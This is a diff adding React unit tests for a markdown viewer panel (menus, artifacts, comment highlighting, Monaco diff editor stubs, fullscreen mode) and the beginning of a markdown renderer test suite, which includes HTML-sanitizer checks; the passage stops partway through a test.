+import { render, screen, fireEvent, waitFor, act, within } from '@testing-library/react'
+import { MemoryRouter, useLocation } from 'react-router-dom'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+
+// ── CSS Custom Highlight API stub (must precede the dynamic import) ──────────
+const highlightRegistry = new Map<string, Range[]>()
+class StubHighlight {
+  readonly ranges: Range[]
+  constructor(...ranges: Range[]) { this.ranges = ranges }
+}
+vi.stubGlobal('Highlight', StubHighlight)
+vi.stubGlobal('CSS', {
+  highlights: {
+    set: (name: string, hl: StubHighlight) => { highlightRegistry.set(name, hl.ranges) },
+    delete: (name: string) => highlightRegistry.delete(name),
+  },
+  escape: (s: string) => s,
+  supports: () => false,
+})
+
+// ── Monaco diff editor stub that actually invokes the panel's callbacks ──────
+interface ModifiedStub {
+  onDidChangeModelContent: (cb: () => void) => { dispose: () => void }
+  onMouseUp: (cb: () => void) => { dispose: () => void }
+  getValue: () => string
+  getSelection: () => { isEmpty: () => boolean; getEndPosition: () => unknown } | null
+  getModel: () => { getValueInRange: () => string | undefined }
+  getScrolledVisiblePosition: () => { left: number; top: number; height: number } | null
+  getDomNode: () => HTMLElement | null
+  revealLineInCenter: (line: number) => void
+}
+interface EditorStub {
+  onDidUpdateDiff: (cb: () => void) => { dispose: () => void }
+  getLineChanges: () => { modifiedStartLineNumber: number }[]
+  getModifiedEditor: () => ModifiedStub
+}
+
+const monaco = {
+  defineTheme: vi.fn(),
+  revealLineInCenter: vi.fn(),
+  /** Value the modified editor reports — what an edit forwards to the owner. */
+  modifiedValue: 'edited inside monaco',
+  /** null = the mouse-up left no selection behind. */
+  selectionText: null as string | null,
+  updateDiff: undefined as undefined | (() => void),
+  contentChange: undefined as undefined | (() => void),
+  mouseUp: undefined as undefined | (() => void),
+}
+
+function makeEditorStub(): EditorStub {
+  const domNode = document.createElement('div')
+  const modified: ModifiedStub = {
+    onDidChangeModelContent: (cb) => { monaco.contentChange = cb; return { dispose: () => {} } },
+    onMouseUp: (cb) => { monaco.mouseUp = cb; return { dispose: () => {} } },
+    getValue: () => monaco.modifiedValue,
+    getSelection: () => (monaco.selectionText === null
+      ? null
+      : { isEmpty: () => false, getEndPosition: () => ({ lineNumber: 1, column: 1 }) }),
+    getModel: () => ({ getValueInRange: () => monaco.selectionText ?? undefined }),
+    getScrolledVisiblePosition: () => ({ left: 12, top: 20, height: 16 }),
+    getDomNode: () => domNode,
+    revealLineInCenter: monaco.revealLineInCenter,
+  }
+  return {
+    onDidUpdateDiff: (cb) => { monaco.updateDiff = cb; return { dispose: () => {} } },
+    getLineChanges: () => [{ modifiedStartLineNumber: 4 }],
+    getModifiedEditor: () => modified,
+  }
+}
+
+vi.mock('@monaco-editor/react', () => ({
+  default: ({ value }: { value?: string }) => <div data-testid="monaco" data-value={value} />,
+  DiffEditor: ({ beforeMount, onMount, modified }: {
+    beforeMount?: (m: { editor: { defineTheme: (n: string, t: unknown) => void } }) => void
+    onMount?: (e: EditorStub) => void
+    modified?: string
+  }) => {
+    useEffect(() => {
+      beforeMount?.({ editor: { defineTheme: monaco.defineTheme } })
+      onMount?.(makeEditorStub())
+      // The panel keeps the callbacks in refs, so re-running on every prop
+      // change would re-register listeners the component never disposes.
+      // eslint-disable-next-line react-hooks/exhaustive-deps -- mount-only, mirrors Monaco's own contract
+    }, [])
+    return <div data-testid="monaco-diff" data-modified={modified} />
+  },
+  loader: { config: () => {} },
+}))
+vi.mock('monaco-editor', () => ({}))
+vi.mock('../utils/monacoLocal', () => ({ ensureMonacoLocal: async () => {} }))
+
+vi.mock('../utils/clipboard', () => ({ copyToClipboard: vi.fn(async () => true) }))
+
+vi.mock('../api/client', () => ({
+  api: {
+    artifacts: vi.fn(),
+    artifact: vi.fn(),
+    createArtifact: vi.fn(),
+    updateArtifact: vi.fn(),
+    setArtifactPinned: vi.fn(),
+    revealPath: vi.fn(),
+    fileDiff: vi.fn(),
+  },
+}))
+
+const { api } = await import('../api/client')
+const { copyToClipboard } = await import('../utils/clipboard')
+const { default: MarkdownPanel, OverflowMenu } = await import('../components/MarkdownPanel')
+
+// ── fetch router ────────────────────────────────────────────────────────────
+interface FetchOpts {
+  knowledgeEnabled?: boolean
+  fileReadText?: string
+}
+let fetchOpts: FetchOpts = {}
+
+function installFetch() {
+  vi.stubGlobal('fetch', vi.fn(async (input: unknown, init?: { method?: string }) => {
+    const url = String(input)
+    if (url.startsWith('/api/knowledge/config')) {
+      return { ok: true, json: async () => ({ enabled: !!fetchOpts.knowledgeEnabled, supported_formats: ['.md', '.txt'] }) }
+    }
+    if (url.startsWith('/api/knowledge/sources')) {
+      if (init?.method === 'POST') return { ok: true, status: 201, json: async () => ({ id: 7 }) }
+      return { ok: true, json: async () => [] }
+    }
+    if (url.startsWith('/api/file-download')) return { ok: true, blob: async () => new Blob(['bytes']) }
+    return {
+      ok: true,
+      status: 200,
+      headers: { get: () => null },
+      text: async () => fetchOpts.fileReadText ?? 'content from disk',
+    }
+  }))
+}
+
+const qc = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+
+/** Renders the current pathname so a navigate() can be asserted on. */
+function LocationProbe() {
+  const loc = useLocation()
+  return <span data-testid="pathname">{loc.pathname}</span>
+}
+
+const wrapper = ({ children }: { children: React.ReactNode }) => (
+  <MemoryRouter>
+    <QueryClientProvider client={qc}>{children}<LocationProbe /></QueryClientProvider>
+  </MemoryRouter>
+)
+
+beforeEach(() => {
+  // The api mocks come from a module factory, so `restoreAllMocks` leaves their
+  // call logs behind — one test's createArtifact call would be read as the next
+  // test's.
+  vi.clearAllMocks()
+  qc.clear()
+  fetchOpts = {}
+  highlightRegistry.clear()
+  localStorage.clear()
+  document.getElementById('mc-comment-hl-style')?.remove()
+  monaco.modifiedValue = 'edited inside monaco'
+  monaco.selectionText = null
+  monaco.updateDiff = undefined
+  monaco.contentChange = undefined
+  monaco.mouseUp = undefined
+  installFetch()
+  // happy-dom has no scrollIntoView; the comment-row flash calls it directly.
+  Object.defineProperty(Element.prototype, 'scrollIntoView', {
+    configurable: true, writable: true, value: vi.fn(),
+  })
+  vi.mocked(api.artifacts).mockResolvedValue({ artifacts: [] } as never)
+  vi.mocked(api.artifact).mockResolvedValue({ live_dirty: false, pinned: false } as never)
+  vi.mocked(api.createArtifact).mockResolvedValue({ slug: 'notes-md', version: 1 } as never)
+  vi.mocked(api.updateArtifact).mockResolvedValue({} as never)
+  vi.mocked(api.setArtifactPinned).mockResolvedValue({} as never)
+  vi.mocked(api.revealPath).mockResolvedValue({ ok: true } as never)
+  vi.mocked(api.fileDiff).mockResolvedValue({ diff: '', original: '', status: 'clean' } as never)
+  vi.spyOn(window, 'alert').mockImplementation(() => {})
+})
+
+afterEach(() => {
+  vi.restoreAllMocks()
+  document.body.style.overflow = ''
+  window.getSelection()?.removeAllRanges()
+})
+
+// ════════════════════════════════════════════════════════════════════════════
+// The ⋯ menu's own library entries
+// ════════════════════════════════════════════════════════════════════════════
+
+function openOverflow(filePath = '/tmp/notes.md', content = '# hi\n') {
+  render(<OverflowMenu filePath={filePath} content={content} />, { wrapper })
+  fireEvent.click(screen.getByTestId('markdown-panel-more-options'))
+}
+
+describe('OverflowMenu — keyboard dismissal', () => {
+  it('closes on Escape and hands focus back to the trigger', () => {
+    openOverflow()
+    const trigger = screen.getByTestId('markdown-panel-more-options')
+    expect(trigger).toHaveAttribute('aria-expanded', 'true')
+    fireEvent.keyDown(screen.getByRole('menu'), { key: 'Escape' })
+    expect(screen.queryByRole('menu')).toBeNull()
+    expect(document.activeElement).toBe(trigger)
+  })
+
+  it('closes on an outside mousedown without moving focus', () => {
+    openOverflow()
+    fireEvent.mouseDown(document.body)
+    expect(screen.queryByRole('menu')).toBeNull()
+  })
+})
+
+describe('OverflowMenu — artifact entries', () => {
+  it('opens the artifact from the menu once the file is already one', async () => {
+    vi.mocked(api.artifacts).mockResolvedValue({ artifacts: [{ slug: 'notes-md', name: 'notes.md' }] } as never)
+    openOverflow()
+    fireEvent.click(await screen.findByText('In Artifacts'))
+    await waitFor(() => expect(screen.getByTestId('pathname')).toHaveTextContent('/artifacts/notes-md'))
+  })
+
+  it('promotes the file from the menu, re-reading it from disk', async () => {
+    fetchOpts.fileReadText = '# the on-disk truth\n'
+    openOverflow('/tmp/notes.md', '# a stale in-memory copy\n')
+    fireEvent.click(await screen.findByText('Add to artifacts'))
+    await waitFor(() => expect(api.createArtifact).toHaveBeenCalled())
+    expect(vi.mocked(api.createArtifact).mock.calls[0][0]).toMatchObject({
+      content: '# the on-disk truth\n', kind: 'markdown', source_path: '/tmp/notes.md',
+    })
+    expect(await screen.findByText('Added!')).toBeInTheDocument()
+  })
+
+  it('keeps the artifact usable when its detail fetch fails', async () => {
+    vi.mocked(api.artifacts).mockResolvedValue({ artifacts: [{ slug: 'notes-md', name: 'notes.md' }] } as never)
+    vi.mocked(api.artifact).mockRejectedValue(new Error('detail unavailable'))
+    openOverflow()
+    // The query falls back to the list row rather than reporting no artifact.
+    expect(await screen.findByText('In Artifacts')).toBeInTheDocument()
+    expect(screen.queryByText('Add to artifacts')).toBeNull()
+  })
+})
+
+describe('OverflowMenu — knowledge entry', () => {
+  it('registers the file as a local source from the menu', async () => {
+    fetchOpts.knowledgeEnabled = true
+    openOverflow()
+    fireEvent.click(await screen.findByText('Add to Knowledge'))
+    await waitFor(() => expect(fetch).toHaveBeenCalledWith(
+      '/api/knowledge/sources', expect.objectContaining({ method: 'POST' }),
+    ))
+    const post = vi.mocked(fetch).mock.calls.find(([, init]) => (init as { method?: string } | undefined)?.method === 'POST')!
+    expect(JSON.parse((post[1] as { body: string }).body)).toEqual({
+      name: 'notes.md', source_type: 'local_file', uri: '/tmp/notes.md',
+    })
+  })
+
+  it('offers no knowledge entry for an unsupported extension', async () => {
+    fetchOpts.knowledgeEnabled = true
+    openOverflow('/tmp/mod.py', 'a = 1\n')
+    await screen.findByText('Add to artifacts')
+    expect(screen.queryByText('Add to Knowledge')).toBeNull()
+  })
+})
+
+// ════════════════════════════════════════════════════════════════════════════
+// The panel
+// ════════════════════════════════════════════════════════════════════════════
+
+interface MountOpts {
+  filePath?: string
+  content?: string
+  savedBaseline?: string
+  onRefresh?: (p: string) => Promise<void>
+  onContentChange?: (c: string) => void
+  onSubmitComments?: (m: string) => void
+  initialDiffMode?: boolean
+}
+
+function panelProps(opts: MountOpts) {
+  return {
+    filePath: opts.filePath ?? '/tmp/notes.md',
+    content: opts.content ?? '# Title\n\nalpha beta gamma\n',
+    onContentChange: opts.onContentChange ?? vi.fn(),
+    onSave: vi.fn(async () => {}),
+    onClose: vi.fn(),
+    onRefresh: opts.onRefresh,
+    onSubmitComments: opts.onSubmitComments,
+    savedBaseline: opts.savedBaseline,
+    initialDiffMode: opts.initialDiffMode ?? false,
+  }
+}
+
+function mountPanel(opts: MountOpts = {}) {
+  const props = panelProps(opts)
+  const utils = render(<MarkdownPanel embedded {...props} />, { wrapper })
+  return { ...utils, props }
+}
+
+/** Open the panel's ⋯ menu (the header's — the first in the tree). */
+function openPanelMenu() {
+  fireEvent.click(screen.getAllByTestId('markdown-panel-more-options')[0])
+}
+
+describe('MarkdownPanel — snapshot failure', () => {
+  it('surfaces the server message instead of reporting a silent snapshot', async () => {
+    vi.mocked(api.artifacts).mockResolvedValue({ artifacts: [{ slug: 'notes-md', name: 'notes.md' }] } as never)
+    vi.mocked(api.updateArtifact).mockRejectedValue(new Error('artifact is read-only'))
+    mountPanel()
+    await screen.findByLabelText('Open as artifact')
+    openPanelMenu()
+    fireEvent.click(await screen.findByText('Snapshot version'))
+    await waitFor(() => expect(window.alert).toHaveBeenCalledWith('artifact is read-only'))
+  })
+})
+
+describe('MarkdownPanel — discard with no owner refresh', () => {
+  it('re-reads the file itself when the host supplies no refresh hook', async () => {
+    vi.spyOn(window, 'confirm').mockReturnValue(true)
+    const onContentChange = vi.fn()
+    fetchOpts.fileReadText = 'the version on disk'
+    mountPanel({ content: 'edited body', savedBaseline: 'disk body', onContentChange })
+    fireEvent.click(screen.getByText('View Source'))
+    fireEvent.click(screen.getByText('Cancel'))
+    await waitFor(() => expect(onContentChange).toHaveBeenCalledWith('the version on disk'))
+    expect(fetch).toHaveBeenCalledWith('/api/file-read?path=%2Ftmp%2Fnotes.md')
+  })
+})
+
+describe('MarkdownPanel — selection copy', () => {
+  it('copies the selected preview text through the clipboard helper', async () => {
+    mountPanel()
+    const para = await screen.findByText(/alpha beta gamma/)
+    const textNode = para.firstChild as Text
+    const range = document.createRange()
+    range.setStart(textNode, 0)
+    range.setEnd(textNode, 5)
+    const sel = window.getSelection()!
+    sel.removeAllRanges()
+    sel.addRange(range)
+    fireEvent.mouseUp(document)
+    fireEvent.click(await screen.findByRole('button', { name: 'Copy' }))
+    expect(copyToClipboard).toHaveBeenCalledWith('alpha')
+  })
+})
+
+describe('MarkdownPanel — comment highlight pointer handling', () => {
+  const FILE = '/tmp/notes.md'
+  const BODY = 'alpha beta gamma\n'
+
+  function seedDraft(anchor: string, text = 'why this?', file = FILE, id = 'c1') {
+    localStorage.setItem('mc-comment-drafts', JSON.stringify({ [file]: [{ id, anchor, text }] }))
+  }
+
+  /** Point caretRangeFromPoint at the start of the painted comment range. */
+  function caretInside(painted: Range) {
+    Object.defineProperty(document, 'caretRangeFromPoint', {
+      configurable: true,
+      value: () => {
+        const caret = document.createRange()
+        caret.setStart(painted.startContainer, painted.startOffset)
+        caret.collapse(true)
+        return caret
+      },
+    })
+  }
+
+  async function mountWithPaintedComment() {
+    seedDraft('beta', 'needs a citation')
+    mountPanel({ filePath: FILE, content: BODY, onSubmitComments: vi.fn() })
+    await waitFor(() => expect(highlightRegistry.get('mc-comment')?.length).toBe(1))
+    return {
+      painted: highlightRegistry.get('mc-comment')![0],
+      scrollRoot: document.querySelector('.overflow-auto') as HTMLElement,
+    }
+  }
+
+  it('flashes the comment row when its highlighted anchor is clicked', async () => {
+    const { painted, scrollRoot } = await mountWithPaintedComment()
+    caretInside(painted)
+    await act(async () => { fireEvent.click(scrollRoot, { clientX: 20, clientY: 20 }) })
+    const row = document.querySelector('[data-comment-id="c1"]') as HTMLElement
+    // The background is set through a CSS custom property, which happy-dom
+    // does not retain on the inline style; the transition it is paired with is
+    // a plain value and proves the same code ran.
+    expect(row.style.transition).toBe('background 0.3s ease')
+    expect(Element.prototype.scrollIntoView).toHaveBeenCalled()
+
+    // A second click cancels the in-flight flash before starting the next one,
+    // so two rows are never lit at once.
+    await act(async () => { fireEvent.click(scrollRoot, { clientX: 20, clientY: 20 }) })
+    expect(vi.mocked(Element.prototype.scrollIntoView).mock.calls.length).toBeGreaterThan(1)
+  })
+
+  it('ignores a pointer that lands outside every commented range', async () => {
+    const { scrollRoot } = await mountWithPaintedComment()
+    // A caret in a detached node cannot be inside any painted range.
+    const stray = document.createTextNode('elsewhere')
+    Object.defineProperty(document, 'caretRangeFromPoint', {
+      configurable: true,
+      value: () => { const r = document.createRange(); r.setStart(stray, 0); r.collapse(true); return r },
+    })
+    await act(async () => { fireEvent.mouseMove(scrollRoot, { clientX: 5, clientY: 5 }) })
+    expect(document.querySelector('.mc-comment-tooltip')).toBeNull()
+    await act(async () => { fireEvent.click(scrollRoot, { clientX: 5, clientY: 5 }) })
+    const row = document.querySelector('[data-comment-id="c1"]') as HTMLElement
+    expect(row.style.transition).toBe('')
+  })
+
+  it('repaints the highlights after the preview DOM mutates underneath them', async () => {
+    const { scrollRoot } = await mountWithPaintedComment()
+    // Lazy content and syntax highlighting land after the first paint; the
+    // observer is what keeps the ranges attached to the new nodes.
+    await act(async () => {
+      scrollRoot.appendChild(document.createElement('span'))
+      await new Promise(resolve => setTimeout(resolve, 120))
+    })
+    expect(highlightRegistry.get('mc-comment')?.length).toBe(1)
+  })
+
+  it('adopts the drafts of a file switched in under the same panel', async () => {
+    localStorage.setItem('mc-comment-drafts', JSON.stringify({
+      '/tmp/first.md': [{ id: 'a1', anchor: 'alpha', text: 'note on the first file' }],
+      '/tmp/second.md': [{ id: 'b1', anchor: 'alpha', text: 'note on the second file' }],
+    }))
+    const onSubmitComments = vi.fn()
+    const { rerender } = render(
+      <MarkdownPanel embedded {...panelProps({ filePath: '/tmp/first.md', content: BODY, onSubmitComments })} />,
+      { wrapper },
+    )
+    expect(await screen.findByText('note on the first file')).toBeInTheDocument()
+    rerender(
+      <MarkdownPanel embedded {...panelProps({ filePath: '/tmp/second.md', content: BODY, onSubmitComments })} />,
+    )
+    expect(await screen.findByText('note on the second file')).toBeInTheDocument()
+    expect(screen.queryByText('note on the first file')).toBeNull()
+  })
+})
+
+describe('MarkdownPanel — Monaco diff wiring', () => {
+  it('registers both editor themes exactly once and jumps to the first change', async () => {
+    mountPanel({ initialDiffMode: true })
+    await screen.findByTestId('monaco-diff')
+    const themes = monaco.defineTheme.mock.calls.map(([name]) => name)
+    expect(themes).toEqual(['kirocrew-dark', 'kirocrew-light'])
+
+    act(() => { monaco.updateDiff!() })
+    expect(monaco.revealLineInCenter).toHaveBeenCalledWith(4)
+  })
+
+  it('forwards a Monaco edit to the owner only while the diff is editable', async () => {
+    const onContentChange = vi.fn()
+    mountPanel({ initialDiffMode: true, onContentChange })
+    await screen.findByTestId('monaco-diff')
+
+    // Preview-side diff is read-only: an edit event cannot reach the owner.
+    act(() => { monaco.contentChange!() })
+    expect(onContentChange).not.toHaveBeenCalled()
+
+    fireEvent.click(screen.getByText('View Source'))
+    act(() => { monaco.contentChange!() })
+    expect(onContentChange).toHaveBeenCalledWith('edited inside monaco')
+  })
+
+  it('raises the comment popover from a diff-editor selection', async () => {
+    monaco.selectionText = '  const answer = 42  '
+    mountPanel({ initialDiffMode: true, onSubmitComments: vi.fn() })
+    await screen.findByTestId('monaco-diff')
+
+    // The panel debounces the selection read by 10ms so Monaco has committed it.
+    await act(async () => {
+      monaco.mouseUp!()
+      await new Promise(resolve => setTimeout(resolve, 30))
+    })
+    fireEvent.click(await screen.findByRole('button', { name: 'Comment' }))
+    // No DOM selection exists on the Monaco path, so the rect is used as-is.
+    expect(await screen.findByLabelText('Add a comment')).toBeInTheDocument()
+
+    fireEvent.click(screen.getByLabelText('Close'))
+    await waitFor(() => expect(screen.queryByLabelText('Add a comment')).toBeNull())
+  })
+
+  it('leaves the selection alone when the mouse-up selected nothing', async () => {
+    mountPanel({ initialDiffMode: true, onSubmitComments: vi.fn() })
+    await screen.findByTestId('monaco-diff')
+    await act(async () => {
+      monaco.mouseUp!()
+      await new Promise(resolve => setTimeout(resolve, 30))
+    })
+    expect(screen.queryByRole('button', { name: 'Comment' })).toBeNull()
+  })
+})
+
+describe('MarkdownPanel — fullscreen for a code file', () => {
+  async function goFullscreen(opts: MountOpts) {
+    mountPanel(opts)
+    openPanelMenu()
+    fireEvent.click(screen.getByText('Full screen'))
+    return screen.findByRole('dialog')
+  }
+
+  it('offers the knowledge toggle in the overlay header too', async () => {
+    fetchOpts.knowledgeEnabled = true
+    const dialog = await goFullscreen({})
+    await waitFor(() => expect(
+      within(dialog).getByLabelText('Add to Knowledge Library'),
+    ).toBeInTheDocument())
+  })
+
+  it('is the only route from a code file to its highlighted preview', async () => {
+    // canPreview is markdown-only, so the side-panel header has no
+    // source/preview toggle for a .py file — the overlay toolbar carries one.
+    const dialog = await goFullscreen({ filePath: '/tmp/mod.py', content: 'value = 41 + 1\n' })
+    expect(within(dialog).getByLabelText('Toggle word wrap')).toBeInTheDocument()
+    expect(within(dialog).getByLabelText('Toggle autocomplete')).toBeInTheDocument()
+    expect(within(dialog).getByLabelText('Toggle line numbers')).toBeInTheDocument()
+
+    fireEvent.click(within(dialog).getByText('Preview'))
+    // Out of the editor: the code is now rendered read-only and syntax-tokenised.
+    await waitFor(() => expect(within(dialog).getByText('Edit')).toBeInTheDocument())
+    const pre = dialog.querySelector('pre')
+    expect(pre).not.toBeNull()
+    // Only the tokenised spans are asserted: DOMPurify running on happy-dom
+    // drops the leading bare text node of a fragment, so `value =` is absent
+    // here while a real browser keeps it — an environment artifact, not the
+    // panel's behaviour.
+    expect(pre!.querySelector('.hljs-number')).not.toBeNull()
+    expect(pre!.textContent).toContain('41 + 1')
+  })
+
+  it('persists the overlay editor toggles from the overlay itself', async () => {
+    const dialog = await goFullscreen({ filePath: '/tmp/mod.py', content: 'value = 41 + 1\n' })
+    fireEvent.click(within(dialog).getByLabelText('Toggle word wrap'))
+    fireEvent.click(within(dialog).getByLabelText('Toggle autocomplete'))
+    fireEvent.click(within(dialog).getByLabelText('Toggle line numbers'))
+    await waitFor(() => expect(localStorage.getItem('mc-file-wordwrap')).toBe('0'))
+    expect(localStorage.getItem('mc-file-autocomplete')).toBe('0')
+    expect(localStorage.getItem('mc-file-linenums')).toBe('0')
+  })
+
+  it('falls back to auto-detection for an extension with no registered grammar', async () => {
+    // langFor maps an unknown extension to `plaintext`, which this build never
+    // registers with highlight.js — so the explicit-language call throws and the
+    // auto-detecting pass has to render the file instead of it going blank.
+    const dialog = await goFullscreen({ filePath: '/tmp/gateway.log', content: 'READY on port 8080\n' })
+    fireEvent.click(within(dialog).getByText('Preview'))
+    await waitFor(() => expect(within(dialog).getByText('Edit')).toBeInTheDocument())
+    const pre = dialog.querySelector('pre')
+    expect(pre).not.toBeNull()
+    expect(pre!.textContent).toContain('8080')
+  })
+
+  it('copies the path from the overlay footer', async () => {    const dialog = await goFullscreen({})
+    fireEvent.click(within(dialog).getByTitle('Click to copy path'))
+    expect(copyToClipboard).toHaveBeenCalledWith('/tmp/notes.md')
+  })
+
+  it('routes a diff-editor selection into the overlay comment toolbar', async () => {
+    monaco.selectionText = 'alpha beta'
+    await goFullscreen({ initialDiffMode: true, onSubmitComments: vi.fn() })
+    await screen.findByTestId('monaco-diff')
+    await act(async () => {
+      monaco.mouseUp!()
+      await new Promise(resolve => setTimeout(resolve, 30))
+    })
+    expect(await screen.findByRole('button', { name: 'Comment' })).toBeInTheDocument()
+  })
+})
+
+describe('MarkdownPanel — live file watch', () => {
+  interface StubStream { onmessage?: (ev: { data: string }) => void; onerror?: () => void; onopen?: () => void }
+  const streams: StubStream[] = []
+
+  function installEventSource() {
+    class StubEventSource implements StubStream {
+      onmessage?: (ev: { data: string }) => void
+      onerror?: () => void
+      onopen?: () => void
+      constructor(readonly url: string) { streams.push(this) }
+      close() {}
+    }
+    vi.stubGlobal('EventSource', StubEventSource)
+  }
+
+  it('pushes a watched on-disk change into the panel', async () => {
+    streams.length = 0
+    installEventSource()
+    const onContentChange = vi.fn()
+    const props = { ...panelProps({ onContentChange }), liveWatch: true }
+    render(<MarkdownPanel embedded {...props} />, { wrapper })
+    await waitFor(() => expect(streams.length).toBe(1))
+    act(() => { streams[0].onmessage?.({ data: JSON.stringify({ content: 'rewritten on disk' }) }) })
+    expect(onContentChange).toHaveBeenCalledWith('rewritten on disk')
+  })
+})
+
+describe('MarkdownPanel — comment anchoring edge cases', () => {
+  /** Select `word` in the preview and raise the selection toolbar. */
+  async function selectInPreview(word: string) {
+    const para = await screen.findByText(/alpha beta gamma/)
+    const textNode = para.firstChild as Text
+    const start = textNode.data.indexOf(word)
+    const range = document.createRange()
+    range.setStart(textNode, start)
+    range.setEnd(textNode, start + word.length)
+    const sel = window.getSelection()!
+    sel.removeAllRanges()
+    sel.addRange(range)
+    fireEvent.mouseUp(document)
+    return screen.findByRole('button', { name: 'Comment' })
+  }
+
+  it('recovers the anchor from the toolbar text when the selection is already gone', async () => {
+    mountPanel({ onSubmitComments: vi.fn() })
+    const commentBtn = await selectInPreview('gamma')
+    // A click elsewhere can clear the live selection before the handler runs;
+    // the anchor then has to come from the text the toolbar captured.
+    window.getSelection()!.removeAllRanges()
+    fireEvent.click(commentBtn)
+    fireEvent.change(await screen.findByLabelText('Add a comment'), { target: { value: 'from the fallback' } })
+    fireEvent.click(screen.getByLabelText('Add comment'))
+    await screen.findByText('from the fallback')
+    const stored = JSON.parse(localStorage.getItem('mc-comment-drafts') || '{}')
+    expect(stored['/tmp/notes.md'][0]).toMatchObject({ anchor: 'gamma', line: 3, column: 12 })
+    // No live range existed, so nothing was wrapped in a <mark>.
+    expect(document.querySelector('mark')).toBeNull()
+  })
+
+  it('marks every text node a cross-block selection touches', async () => {
+    mountPanel({ content: '# Title\n\nalpha beta gamma\n\ndelta epsilon\n', onSubmitComments: vi.fn() })
+    const first = await screen.findByText(/alpha beta gamma/)
+    const second = await screen.findByText(/delta epsilon/)
+    const range = document.createRange()
+    range.setStart(first.firstChild as Text, 6)
+    range.setEnd(second.firstChild as Text, 5)
+    const sel = window.getSelection()!
+    sel.removeAllRanges()
+    sel.addRange(range)
+    fireEvent.mouseUp(document)
+    fireEvent.click(await screen.findByRole('button', { name: 'Comment' }))
+    await screen.findByLabelText('Add a comment')
+    // One <mark> per touched text node, not one for the whole selection.
+    expect(document.querySelectorAll('mark').length).toBeGreaterThan(1)
+  })
+})

--- a/website/src/test/MarkdownRendererCoverage.test.tsx
+++ b/website/src/test/MarkdownRendererCoverage.test.tsx
@@ -1,0 +1,551 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, fireEvent, act, waitFor } from '@testing-library/react'
+import type { ReactNode } from 'react'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+import MarkdownRenderer, {
+  Lightbox,
+  BasePathCtx,
+  artifactSlugFromHref,
+  soleLinkInParagraph,
+  fixCodeFences,
+  rehypeSanitize,
+} from '../components/MarkdownRenderer'
+import { ThemeProvider } from '../hooks/useTheme'
+import { __resetPathKindCache } from '../hooks/usePathKind'
+import { api } from '../api/client'
+
+// ── pure helpers ───────────────────────────────────────────────────────────
+
+describe('artifactSlugFromHref', () => {
+  it('keeps the raw segment when it is not valid percent-encoding', () => {
+    // `%E0%A4%A` is a truncated UTF-8 escape: decodeURIComponent throws, and the
+    // href must still resolve to *something* rather than dropping the link.
+    expect(artifactSlugFromHref('/artifacts/%E0%A4%A')).toBe('%E0%A4%A')
+  })
+
+  it('decodes a well-formed encoded slug and ignores query/hash', () => {
+    expect(artifactSlugFromHref('/artifacts/my%20plan?v=2#top')).toBe('my plan')
+  })
+})
+
+describe('soleLinkInParagraph', () => {
+  it('returns null when handed no node at all', () => {
+    expect(soleLinkInParagraph()).toBeNull()
+  })
+
+  it('returns null for a paragraph that carries no anchor', () => {
+    expect(
+      soleLinkInParagraph({
+        type: 'element',
+        tagName: 'p',
+        properties: {},
+        children: [{ type: 'text', value: '   ' }],
+      }),
+    ).toBeNull()
+  })
+})
+
+describe('fixCodeFences ordered-list escaping', () => {
+  it('escapes a bare "N." line so it does not become an ordered list', () => {
+    const out = fixCodeFences('Step count\n\n1.\n')
+    expect(out).toContain('1\\.')
+  })
+
+  it('leaves a bare "N." inside a fence alone and resumes escaping after it closes', () => {
+    // Fence tracking: the opening ``` arms it, the matching ``` disarms it, so
+    // `1.` is code and `2.` is prose.
+    const out = fixCodeFences('```\n1.\n```\n2.\n')
+    expect(out).toContain('\n1.\n')
+    expect(out).toContain('2\\.')
+  })
+
+  it('does not treat a shorter tilde run as closing a longer backtick fence', () => {
+    const out = fixCodeFences('````\n3.\n``\n4.\n````\n5.\n')
+    // Still inside the ```` fence for 3. and 4.; only 5. is prose.
+    expect(out).not.toContain('3\\.')
+    expect(out).not.toContain('4\\.')
+    expect(out).toContain('5\\.')
+  })
+})
+
+// ── sanitize / escaped-tag reconstruction ──────────────────────────────────
+
+describe('rehypeSanitize reconstruction', () => {
+  it('escapes an unknown tag nested inside another unknown tag', () => {
+    const { container } = render(
+      <MarkdownRenderer content={'<outertag><innertag>deep</innertag></outertag>'} />,
+    )
+    const text = container.textContent || ''
+    expect(text).toContain('<outertag>')
+    expect(text).toContain('<innertag>')
+    expect(text).toContain('deep')
+    expect(text).toContain('</innertag>')
+    expect(text).toContain('</outertag>')
+  })
+
+  it('keeps an inline data:image src on an img but drops other data: URLs', () => {
+    // Exercised against the exported policy directly: react-markdown's own
+    // urlTransform rejects data: URLs before the component ever sees them, so
+    // the allowance can only be observed at the plugin level.
+    type SanitizeTree = Parameters<ReturnType<typeof rehypeSanitize>>[0]
+    const png = 'data:image/png;base64,iVBORw0KGgo='
+    const tree = {
+      type: 'root',
+      children: [
+        { type: 'element', tagName: 'img', properties: { src: png }, children: [] },
+        {
+          type: 'element',
+          tagName: 'img',
+          properties: { src: 'data:text/html,<b>no</b>' },
+          children: [],
+        },
+      ],
+    } as unknown as SanitizeTree
+    rehypeSanitize()(tree)
+    const imgs = (tree as unknown as { children: { properties: Record<string, unknown> }[] }).children
+    expect(imgs[0].properties.src).toBe(png)
+    expect(imgs[1].properties.src).toBeUndefined()
+  })
+})
+
+// ── markdown images ────────────────────────────────────────────────────────
+
+describe('MarkdownRenderer images', () => {
+  it('renders nothing for an image with no source', () => {
+    const { container } = render(<MarkdownRenderer content={'![empty]()'} />)
+    expect(container.querySelector('img')).toBeNull()
+  })
+
+  it('resolves a relative image against the document base path', () => {
+    const { container } = render(
+      <BasePathCtx.Provider value={'/notes/plan/readme.md'}>
+        <MarkdownRenderer content={'![shot](pics/shot.png)'} />
+      </BasePathCtx.Provider>,
+    )
+    const img = container.querySelector('img')!
+    expect(img.getAttribute('src')).toBe(
+      `/api/file-raw?path=${encodeURIComponent('/notes/plan/pics/shot.png')}`,
+    )
+  })
+
+  it('swaps in an attachment fallback once the image fails to load', () => {
+    const { container } = render(<MarkdownRenderer content={'![broken shot](/tmp/gone.png)'} />)
+    const img = container.querySelector('img')!
+    fireEvent.error(img)
+    expect(container.querySelector('img')).toBeNull()
+    expect(container.textContent).toContain('broken shot')
+  })
+
+  it('releases the layout placeholder once the image has loaded', () => {
+    const { container } = render(<MarkdownRenderer content={'![shot](/tmp/shot.png)'} />)
+    const img = () => container.querySelector('img')!
